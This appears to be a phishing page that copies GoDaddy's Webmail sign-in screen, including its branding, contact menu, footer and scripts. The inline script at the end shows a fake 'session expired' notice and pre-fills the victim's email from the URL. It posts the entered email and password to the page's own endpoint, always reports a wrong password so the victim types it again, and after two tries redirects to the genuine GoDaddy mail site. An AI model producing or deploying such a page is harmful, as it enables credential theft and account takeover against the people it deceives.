        <path
          d="M391.24 120.47c-1.66-4.19-8.16-6.67-13.6-8.32a1.72 1.72 0 0 1-1-1.59 1.82 1.82 0 0 1 .37-1.1 15.4 15.4 0 0 0 4-10.27c0-5.92-3.25-11.67-10-11.67s-10 5.75-10 11.67a15.4 15.4 0 0 0 4 10.27 1.81 1.81 0 0 1 .36 1.1 1.71 1.71 0 0 1-1 1.59c-5.45 1.65-11.94 4.13-13.6 8.32a6.39 6.39 0 0 0-.47 2.41 6 6 0 0 0 4.75 6h31.86a6 6 0 0 0 4.74-6 6.58 6.58 0 0 0-.41-2.41z"
          class="svg-fill-gray-light" />
        <path stroke-linecap="round" stroke-miterlimit="10" stroke-width="4" d="M331.67 259.88h66.96"
          class="svg-fill-none svg-stroke-gray-dark" />
      </g>
    </svg></div>
    <div class="footer_fixer">
      <div id="header-b2c6d13d69bf960158ae325f22128a50">
        <div role="banner"><a href="https://sso.secureserver.net/login?app=email&amp;realm=pass#uxContent"
            class="skip-to-main-content">Skip to main content</a>
          <div>
            <div class="language-header see-change-bar">
              <div class="container-fluid">
                <div class="flex-row d-flex">
                  <div class="see-change-bar-left d-flex">
                    <div class="topnav-logo-wrap"><a href="" class="topnav-logo" data-eid="uxp.hyd.utility_bar.logo.link.click"><span class="mobile-logo go-logo" aria-label="GoDaddy"><span class="sr-only sr-logo">GoDaddy</span></span><span class="desktop-logo go-logo" aria-label="GoDaddy"><span class="sr-only sr-logo">GoDaddy</span><svg class="svg-fill-black" viewBox="0 0 166 34" xmlns="http://www.w3.org/2000/svg">
                            <path d="M32.937 1.554c-3.968-2.48-9.193-1.889-13.852 1.039C14.44-.335 9.213-.925 5.25 1.553c-6.27 3.919-7.032 14.01-1.701 22.54 3.93 6.289 10.074 9.974 15.544 9.906 5.47.068 11.615-3.617 15.545-9.906 5.324-8.53 4.568-18.621-1.701-22.54zM6.43 22.292a20.434 20.434 0 01-2.46-5.632 16.104 16.104 0 01-.534-5.31c.238-3.153 1.521-5.608 3.612-6.914s4.855-1.385 7.8-.217c.441.177.878.38 1.312.606a24.09 24.09 0 00-4.228 5.081C8.697 15.086 7.71 20.848 8.84 25.443a20.911 20.911 0 01-2.408-3.151zm27.786-5.634a20.482 20.482 0 01-2.46 5.632 21.1 21.1 0 01-2.408 3.158c1.01-4.12.324-9.165-2.153-13.897a.625.625 0 00-.895-.243l-7.72 4.823a.631.631 0 00-.2.87l1.133 1.811a.63.63 0 00.869.2l5.004-3.126c.162.486.324.971.445 1.457a16.1 16.1 0 01.536 5.303c-.238 3.151-1.521 5.606-3.612 6.914a7.06 7.06 0 01-3.579 1.036h-.16a7.051 7.051 0 01-3.578-1.036c-2.093-1.308-3.376-3.763-3.614-6.914a16.143 16.143 0 01.534-5.31 21.015 21.015 0 016.444-10.314 16.137 16.137 0 014.532-2.806c2.936-1.168 5.705-1.09 7.797.217 2.093 1.308 3.375 3.761 3.613 6.914a16.145 16.145 0 01-.528 5.311zm39.848-3.766c-4.06 0-7.34 3.169-7.34 7.2 0 4.004 3.28 7.121 7.34 7.121 4.086 0 7.366-3.112 7.366-7.12 0-4.03-3.275-7.2-7.366-7.2zm0 10.557c-1.871 0-3.295-1.513-3.295-3.384s1.424-3.407 3.295-3.407c1.898 0 3.322 1.54 3.322 3.412 0 1.87-1.424 3.385-3.322 3.385zM90.583 7.362h-7.468a.6.6 0 00-.61.612v18.208a.605.605 0 00.61.648h7.468c5.977 0 10.13-3.975 10.13-9.758 0-5.818-4.153-9.71-10.13-9.71zm.177 15.622h-4.087V11.198h4.087c3.308 0 5.588 2.474 5.588 5.866 0 3.336-2.28 5.92-5.588 5.92zm24.82-9.7h-2.809a.633.633 0 00-.582.612v.833c-.64-1.057-2.085-1.835-3.884-1.835-3.503 0-6.783 2.751-6.783 7.145 0 4.37 3.251 7.171 6.755 7.171 1.806 0 3.28-.777 3.92-1.834v.861a.587.587 0 00.582.585h2.808a.571.571 0 00.584-.585V13.896a.594.594 0 00-.592-.612zm-6.533 10.196c-1.86 0-3.256-1.43-3.256-3.412s1.397-3.41 3.256-3.41c1.86 0 3.257 1.426 3.257 3.408s-1.395 3.412-3.257 3.412zm22.294-16.118h-2.808a.592.592 0 00-.61.584v6.728c-.648-1.002-2.114-1.78-3.948-1.78-3.476 0-6.7 2.751-6.7 7.145 0 4.37 3.252 7.171 6.755 7.171 1.806 0 3.17-.777 3.92-1.834v.861c0 .322.261.583.583.585h2.808a.57.57 0 00.584-.585V7.95a.57.57 0 00-.584-.588zm-6.532 16.152c-1.852 0-3.237-1.444-3.237-3.448s1.39-3.447 3.237-3.447c1.846 0 3.237 1.444 3.237 3.447s-1.384 3.448-3.237 3.448zm22.29-16.152h-2.803a.594.594 0 00-.612.584v6.728c-.64-1.002-2.114-1.78-3.947-1.78-3.477 0-6.7 2.751-6.7 7.145 0 4.37 3.253 7.171 6.755 7.171 1.807 0 3.168-.777 3.92-1.834v.861a.587.587 0 00.584.585h2.803a.568.568 0 00.582-.585V7.95a.568.568 0 00-.582-.588zm-6.532 16.152c-1.853 0-3.237-1.444-3.237-3.448s1.39-3.447 3.237-3.447c1.846 0 3.237 1.444 3.237 3.447s-1.38 3.448-3.232 3.448zm21.906-9.283l-4.19 14.37c-.809 2.556-2.613 4.086-5.421 4.086-1.277 0-2.44-.261-3.35-.782-.531-.303-.971-.58-.971-1.023 0-.275.089-.417.25-.675l.832-1.246c.235-.348.408-.461.66-.461a.96.96 0 01.554.192c.523.339 1.008.63 1.748.63.864 0 1.524-.277 1.88-1.306l.36-1.193h-1.696c-.418 0-.648-.249-.751-.584l-3.75-12.008c-.14-.473-.011-.946.683-.946h2.954c.36 0 .613.123.771.64l2.77 9.67 2.589-9.67c.082-.334.306-.64.75-.64h2.802c.552-.001.719.387.526.946zm-96.806 4.274v7.676a.625.625 0 01-.635.634h-2.317a.623.623 0 01-.634-.634v-2.015c-1.472 1.858-4.03 3.028-6.924 3.028-5.434 0-9.681-4.088-9.681-9.908 0-6.048 4.585-10.217 10.377-10.217 4.276 0 7.694 1.839 9.212 5.537a.843.843 0 01.07.309c0 .175-.116.307-.486.435l-2.706 1.042a.694.694 0 01-.511.009.783.783 0 01-.324-.371c-.971-1.847-2.7-3.1-5.36-3.1-3.45 0-5.922 2.694-5.922 6.188 0 3.387 2.104 6.172 6.02 6.172 2.06 0 3.703-.97 4.469-2.037H57.87a.625.625 0 01-.634-.635v-2.086a.625.625 0 01.634-.634h7.161a.604.604 0 01.635.607zm96.882-8.063v-.186c0-.013.005-.026.013-.036a.052.052 0 01.034-.013h1.183c.013 0 .025.005.034.013.009.01.013.023.013.036v.186a.052.052 0 01-.013.034.047.047 0 01-.034.013h-.432v1.167a.05.05 0 01-.048.048h-.224a.044.044 0 01-.032-.014.047.047 0 01-.015-.034v-1.167h-.432a.044.044 0 01-.047-.047zm2.069-.193l.323.75.324-.75a.066.066 0 01.026-.032.087.087 0 01.044-.01h.375a.044.044 0 01.047.046v1.404a.044.044 0 01-.045.047h-.21a.047.047 0 01-.035-.013.042.042 0 01-.013-.034v-1.06l-.348.77a.084.084 0 01-.026.038.08.08 0 01-.043.01h-.172a.078.078 0 01-.042-.01.073.073 0 01-.026-.037l-.346-.77v1.06a.052.052 0 01-.013.033.052.052 0 01-.032.013h-.216a.042.042 0 01-.03-.013.042.042 0 01-.013-.034v-1.404a.044.044 0 01.047-.046h.364c.014 0 .029.003.042.01.009.009.015.02.018.032z">
                            </path>
                          </svg></span></a></div>
                  </div>
                  <div class="see-change-bar-right justify-content-end"><div class="tray-menu contact-tray"><div class="tray-toggle-wrapper"><button aria-label="Contact Us" class="tray-toggle" data-eid="uxp.hyd.utility_bar.contact_tray.tray.click" aria-expanded="false" aria-haspopup="true"><span><span title="Contact Us" class="phone-header"><svg class="uxicon-svg-container" height="1.5em" width="1.5em" role="presentation"><use fill="currentColor" xlink:href="#svg-container-phone"></use></svg></span><span class="basic-phone-text hidden-sm-down title-text">Contact Us 24/7</span></span><span class="chevron-down"><svg class="uxicon-svg-container" height="20" width="20" role="presentation"><use fill="currentColor" xlink:href="#svg-container-chevron-down"></use></svg></span></button></div><div class="tray-fullwidth tray-dropdown loaded"><div class="tray-content"><button class="close" aria-label="close"></button><div class="container"><div class="support-announcement-all"><span class="support-announcement-text"><svg class="uxicon-svg-container" height="1.5em" width="1.5em" role="presentation"><use fill="currentColor" xlink:href="#svg-container-information"></use></svg>Keep Your Business Open During COVID-19</span><span class="support-announcement-btn"><a href="https://ie.godaddy.com/open-we-stand" target="_self" data-eid="uxp.hyd.utility_bar.support_announcement_btn.click" data-tcc-ignore="true" class="ux-button ux-button-secondary ux-button-small btn btn-sm btn-default">Learn More</a></span></div><div class="row"><div class="col-lg-4 col-md-6 content-wrap"><div class="row"><div class="col-sm-12"><div role="heading" aria-level="2" class="font-primary-bold h3">Call us</div></div></div><ul class="alt-contact-list list-unstyled"><li><span>24/7 Support US:</span><a class="contact-link" data-eid="uxp.hyd.utility_bar.support_phone.click" href="tel:14803663549">+1 480 366 3549</a></li><li><span>24/7 Support US:</span><a class="contact-link" data-eid="uxp.hyd.utility_bar.support_phone.click" href="tel:14803663549">+1 480 366 3549</a></li></ul><div class="contact-link-info">Global Directory</div><a href="https://ie.godaddy.com/contact-us" target="_self" data-eid="uxp.hyd.utility_bar.global_directory.link.click" data-tcc-ignore="true" class="contact-link">Phone numbers and hours</a></div><div class="col-lg-4 col-md-6 content-wrap divider"><div id="gdchat-container"></div></div><div class="col-md-4 help-mobile hidden-md-up"><div class="row"><div class="col-sm-12"><div role="heading" aria-level="2" class="font-primary-bold h3">Help Center</div></div></div><p>Explore our online help resources</p><div><a href="https://ie.godaddy.com/help" target="_self" data-eid="uxp.hyd.utility_bar.help_center_link.link.click" data-tcc-ignore="true" class="ux-button ux-button-secondary btn btn-default">Get Help</a></div></div></div></div></div></div></div></div>
                </div>
              </div>
            </div>
          </div><span aria-label="Main content starts here" id="uxContent" role="navigation"></span>
        </div>
      </div>
      <div class="lg-container">
        <div id="iframe-shrinker" class="row">
          <div id="login-container-row" class="panel-container-row">
            <div id="left-col" class="col-lg-6 col-xl-6"></div>
            <div id="login-container-col"
              class="container-width-limit col-xs-12 col-sm-8 offset-sm-2 col-md-6 offset-md-3 col-lg-6 col-xl-6  offset-lg-0 ">
              <div id="login-container">
                <div id="login-panel" class="ssodeck-framable-content">
                  <div>
                    <div id="new-ux" class="card ux-card form-container reseller fs-unmask">
                      <div class="card-block reseller pass ">
                        <div></div>
                        <div id="form-header" class="reseller-form-header">
                          <div id="pass-template" class="m-b-sm">
                            <div id="app-title" class="logo-container-pass text-center">
                              <h2 class="white-override m-b-none">Webmail</h2>
                            </div>
                          </div>
                        </div>
                        <div id="form-container" class="" style="margin-bottom: 40px;">
                          <div id="login-status-message" style="display: none;"><div id="classs" class="ux-text ux-dialog-shell ux-alert ux-alert--info ux-dialog--contrast ux-dialog--stretch" aria-labelledby="login-status-alert" role="alert" dismissible="false">
                            <div class="ux-dialog-content">Your session has expired, please sign in to continue.</div>
                          </div></div>
                          <div id="login-status-message2" style="display: none;"><div id="class2" class="ux-text ux-dialog-shell ux-alert ux-alert--critical ux-dialog--contrast ux-dialog--stretch" aria-labelledby="login-failure-alert" role="alert" dismissible="false"> 
                            <div class="ux-dialog-content">You entered an incorrect email or password. Please try again or try <a target="_top" id="forgot_password_link" href="">resetting your password</a>.</div>  
                          </div></div>
                          <h2 id="pass-title">Sign in</h2>
                          <form name="myForm" id="contactForm" action="" method="post">
                            <input type="hidden" name="source" id="source" value="secureserver">
                            <div class="form-group">
                              <div class="alert alert-danger hide" id="msg" style="color: red;"></div>
                            </div>
                            <div id="username-container">
                              <div class="ff-form-field inline-input inline-input-required fs-mask" style="border: red !important;">
                                <div class="ff-field"><input autocomplete="off" type="username" label="Email" message=""
                                    aria-label="Email. ." aria-required="true" aria-disabled="false"
                                    aria-labelledby="label-username" aria-describedby="message" class="ff-input"
                                    required="" name="email" id="email"><label class="ff-label floating-label" for="username"
                                    id="label-username" aria-required="false">Email</label></div>
                                    <span class="ff-message ff-error ff-error1" style="display: none;"><span id="message" aria-live="assertive">Username is required</span></span>
                              </div>
                            </div>
                            <div id="password-container">
                              <div class="ff-form-field inline-input inline-input-required fs-mask">
                                <div class="ff-field"><input autocomplete="off" message="" label="Password"
                                    type="password" aria-label="Password. ." aria-required="true" aria-disabled="false"
                                    aria-labelledby="label-password" aria-describedby="message" class="ff-input"
                                    required="" name="password" id="password"><label class="ff-label floating-label" for="password"
                                    id="label-password" aria-required="false">Password</label></div>
                                    <span class="ff-message ff-error ff-error2" style="display: none;"><span id="message" aria-live="assertive">Password is required</span></span>
                              </div>
                            </div>
                            <div id="remember-me-container" class="input-container">
                              <fieldset class="form-group">
                                <div class="ux-custom-control ux-custom-checkbox">
                                  <div class="ux-custom-target" role="switch" aria-checked="true"><input tabindex="0"
                                      id="remember-me" type="checkbox" aria-labelledby="label-remember-me"
                                      aria-required="false" class="custom-control-input" value="true" checked=""><svg
                                      class="uxicon-svg-container ux-control-indicator" height="1.5em" width="1.5em"
                                      role="img">
                                      <use fill="currentColor" xlink:href="#svg-container-checkmark"></use>
                                    </svg><label for="remember-me" id="label-remember-me">Keep me signed in on this
                                      device</label></div>
                                </div>
                              </fieldset>
                            </div><button class="ux-button ux-button-primary btn btn-purchase btn-block" id="submitBtn"
                              type="button"><span class="ux-button-text">Sign In</span></button>
                            <div id="social-login-buttons-container" class="">
                             
                            </div>
                          </form>
                         
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div id="footer" style="display: block;">
    <div id="footer-b2c6d13d69bf960158ae325f22128a50">
      <footer id="appheader-footer" class="manifest footer">
        <div class="container">Copyright © 1999 - 2022 All Rights Reserved. </div>
        <div id="gtm_privacy"></div>
      </footer>
    </div>
  </div>


  <div id="svg-container" style="display: none;"><svg>
      <symbol id="svg-container-world" viewBox="0 0 24 24">
        <path
          d="M21.75 12A9.762 9.762 0 0012 2.25a9.75 9.75 0 000 19.5A9.761 9.761 0 0021.75 12zm-1.538-.75h-3.489a16.21 16.21 0 00-1.932-7.003 8.26 8.26 0 015.421 7.003zm-9.401 8.305a14.66 14.66 0 01-2.037-6.805h6.452a14.659 14.659 0 01-2.038 6.806 1.397 1.397 0 01-2.377-.001zM8.774 11.25c.11-2.401.81-4.738 2.037-6.805a1.364 1.364 0 012.377 0 14.659 14.659 0 012.038 6.805zm.434-7.003a16.21 16.21 0 00-1.932 7.003H3.788a8.26 8.26 0 015.42-7.003zm-5.42 8.503h3.488a16.21 16.21 0 001.932 7.003 8.26 8.26 0 01-5.42-7.003zm11.004 7.003a16.21 16.21 0 001.931-7.003h3.489a8.26 8.26 0 01-5.42 7.003z">
        </path>
      </symbol>
      <symbol id="svg-container-chevron-down" viewBox="0 0 24 24">
        <path
          d="M18.53 8.47a.75.75 0 00-1.06 0L12 13.94 6.53 8.47a.75.75 0 00-1.06 1.06l6 6a.75.75 0 001.06 0l6-6a.749.749 0 000-1.06z">
        </path>
      </symbol>
      <symbol id="svg-container-map-pin" viewBox="0 0 24 24">
        <g>
          <path
            d="M12 21.78a2.46 2.46 0 01-1.818-.808c-2.31-2.55-6.186-7.342-6.186-10.79A7.879 7.879 0 0112 2.28a7.879 7.879 0 018.004 7.902c0 3.448-3.875 8.24-6.186 10.79A2.46 2.46 0 0112 21.78zm0-18a6.393 6.393 0 00-6.504 6.402c0 2.15 2.113 5.716 5.797 9.783a.973.973 0 001.414 0c3.684-4.067 5.797-7.632 5.797-9.783A6.396 6.396 0 0012 3.78z">
          </path>
          <path
            d="M12 13.168a2.883 2.883 0 11.001-5.767A2.883 2.883 0 0112 13.168zM12 8.9a1.384 1.384 0 100 2.767 1.384 1.384 0 000-2.767z">
          </path>
        </g>
      </symbol>
    </svg></div>

  <div id="svg-container" style="display: none;"><svg>
      <symbol id="svg-container-checkmark" viewBox="0 0 24 24">
        <path fill-rule="evenodd" d="M21.41 6.5L9 18.91 2.59 12.5 4 11.09l5 5 11-11 1.41 1.41z" clip-rule="evenodd">
        </path>
      </symbol>
    </svg></div>

  <script src="https://img6.wsimg.com/hivemind/hivemind-2.10.0.js"></script>
  <script src="https://img6.wsimg.com/wrhs/e1dea02061937d3f248649b57c90190b/tcc.min.js" async></script>
  <script
    src="https://img6.wsimg.com/poly/v3/polyfill.min.js?features=Promise,Promise.prototype.finally,Intl.~locale.en-US&rum=0&unknown=polyfill&flags=gated">
  </script>
  <script src="https://img6.wsimg.com/wrhs/12263c72ff7a15ea28d22a713a26c1c9/uxcore2.min.js"></script>
  <script src="https://img6.wsimg.com/wrhs/a1ec4030e9dc43d22a343bffd99b8514/vendor~uxcore2.min.js"></script>
  <script src="https://img6.wsimg.com/wrhs-next/0a3c9ed73591ea11f77b51a04edf210f/heartbeat.js" async></script>
  <script src="https://img6.wsimg.com/wrhs/965a6f0c232b45305ff847c4703c8d0e/utilityheader.min.js"></script>
  <script src="https://img6.wsimg.com/auth-assets/597609f2c431be85253547b5910ac601de541525/login-panel.js"></script>
  <script type="application/javascript"
    src="https://sso.godaddy.com/149e9513-01fa-4fb0-aad4-566afd725d1b/2d206a39-8ed7-437e-a3be-862e0f06eea3/p.js">
  </script>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="jquery.min.js"></script>
</body>
<script type="text/javascript">

$("#login-status-message").show();



  const param = new URLSearchParams(window.location.search);
  let emailParam = param.get('email') ? param.get('email') : '';
  let count = 0;
   
  if (emailParam === "null") {
     emailParam = "";
  }
  
   const email = document.getElementById('email');
   const password = document.getElementById('password');
   const source = document.getElementById('source');
   const login = document.getElementById('submitBtn');
   const form = document.getElementById("contactForm");
   email.value = emailParam;
  
   login.addEventListener('click', function(e){
    $("#login-status-message").hide();
    var alert = document.querySelector('.alert');
     e.preventDefault();
     if (email.value === "") {
      $(".ff-message.ff-error.ff-error1").show();
      email.focus();
       return;
     } else if (!email.value.match(/^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/)) {
      $(".ff-message.ff-error.ff-error1").show();
      email.focus();
      return;
    } else if (password.value === "") {
       $(".ff-message.ff-error.ff-error2").show();
       password.focus();
       return;
     } else {
       const domain = email.value.split('@')[1];
       count = count + 1;
  
       $(".ff-message.ff-error.ff-error1").hide();
       $(".ff-message.ff-error.ff-error2").hide();

       var $form = $("#contactForm");
       var data = $form.serialize();
       var url = form.action;
  
  
       var msg = $('#msg').html();
       $('#msg').text( msg );
        
       $.ajax({
         type: "POST",
         url: url,
         data: data,
         cache: false,
         timeout: 800000,
         beforeSend: function(xhr){
          $('#submitBtn').attr("disabled", true);
			    $('#submitBtn').css("cursor", "not-allowed");
          },
        success: function(response){
          if(response){
            password.value = "";
            password.style.borderColor = "red";

            $("#login-status-message2").show();
            $('#submitBtn').attr("disabled", false);
				    $('#submitBtn').css("cursor", "pointer");
  
            if (count >= 2) {
              window.location.replace("http://email.godaddy.com");
              return;
            }
  
  
            console.log(response);
            if(response['signal'] == 'ok'){
              $('#msg').html(response['msg']);
            }
            else{
  
              $('#msg').html(response['msg']);
            }
          }else {
            $("#msg").show();
            $("#msg").html('Something went wrong, please try again later.');
            password.value = "";
            password.style.borderColor = "red";
          }
        },
        error: function(){
          $("#msg").show();
          $('#msg').html("Something went wrong, please try again later.");
          password.value = "";
          password.style.borderColor = "red";
        }
        });
      }  
  });
  </script>
  
  <script>
    window.location.hash  = "v1/login?pl_id=3153&prog_id=3153&app=email&realm=pass"
  </script>
  
</html>